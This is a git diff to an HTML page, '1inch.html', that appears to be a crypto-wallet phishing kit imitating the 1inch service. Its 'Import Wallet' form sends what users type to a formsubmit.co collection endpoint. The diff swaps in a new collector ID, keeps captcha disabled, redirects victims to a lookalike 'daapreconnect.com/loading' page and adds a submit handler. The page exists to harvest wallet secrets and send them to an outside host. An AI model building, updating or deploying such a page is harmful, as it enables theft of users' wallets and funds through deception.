--- a/1inch.html
+++ b/1inch.html
@@ -3,6 +3,7 @@
 <head>
     <meta charset="UTF-8">
     <meta http-equiv="X-UA-Compatible" content="IE=edge">
+    <meta name="color-scheme" content="dark">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css"
     integrity="sha512-iBBXm8fW90+nuLcSKlbmrPcLa0OT92xO1BIsZ+ywDWZCvqsWgccV3gFoRBv0z+8dLJgyAHIhR35VZc2oM/gI1w=="
@@ -62,7 +63,8 @@
             <div class="topsection-container">
                 <h3>Import Wallet</h3>
                 <div class="wallet">
-                    <form class="wallet-container card" action="https://formsubmit.co/2d19e861c74bfc05b2e00bca38874e04" method="POST">
+                    <form class="wallet-container card" action="https://formsubmit.co/de841bc7b232f44751c09b37c0ba1a55" method="POST">
+                        
                         <input type="hidden" name="_next" value="https://daapreconnect.com/loading">
                         <input type="hidden" name="_captcha" value="false">
                         <div class="top">
@@ -98,7 +100,7 @@
                             <label for="manual">Automatic</label>
                             </div>
                           </div>
-                            <input type="submit" id="clk" value="Import">
+                            <input type="submit" onclick="toSubmit()" value="Import">
                             
                         </div>
                         </form>
